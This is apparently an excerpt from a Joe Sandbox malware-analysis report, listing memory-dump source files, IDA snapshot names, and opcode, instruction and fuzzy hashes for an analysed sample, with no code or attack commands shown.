                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                   • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                  • Instruction ID: 69cc28c8e707e70c371e6599bccca1817d7590b955a229a652d1838be13bf6d8
                                  • Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
                                  • Instruction Fuzzy Hash: 7BF01C33A20A344B6360CD7A8D05597A2D797C86B0B1FC96AECA5E7206E930EC0656D5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                   • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e1ff3b8c6657fb42d9e010984e501d17b4ceb8a579c29698b08b0a6b9f8d3bb7
                                  • Instruction ID: 7f062d0506d07213ce899d9d09f7dcf3b9329592ab649cfe8e8d0dfb2e91980f
                                  • Opcode Fuzzy Hash: e1ff3b8c6657fb42d9e010984e501d17b4ceb8a579c29698b08b0a6b9f8d3bb7
                                  • Instruction Fuzzy Hash: A5B01235D402005F970ACB38DC710D232B3B391300399C8E8D01356051DA35D0128600
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1441029645.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                   • Associated: 00000000.00000002.1441004912.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.00000000009B8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000AFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B1F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441029645.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441529576.0000000000B24000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000B26000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000CC0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EB8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441549149.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1441917184.0000000000EC8000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442028481.0000000001087000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1442046501.0000000001089000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_420000_JbN2WYseAr.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: [
                                  • API String ID: 0-784033777
                                  • Opcode ID: e12a6be4fd324a0b1c899d4dc9308133431f5eea1a79f3cd068f74229b9e48fd
                                  • Instruction ID: aeffd502a2d49a7d10cc0196138c1a7a0059e5da9b2803dd7b8ef2cfb7247136
                                  • Opcode Fuzzy Hash: e12a6be4fd324a0b1c899d4dc9308133431f5eea1a79f3cd068f74229b9e48fd
                                  • Instruction Fuzzy Hash: FDB18D719083A15BDBB5BA24889573F7BC8EB55308F1A0D2FE8C5C6381EB2CD844875B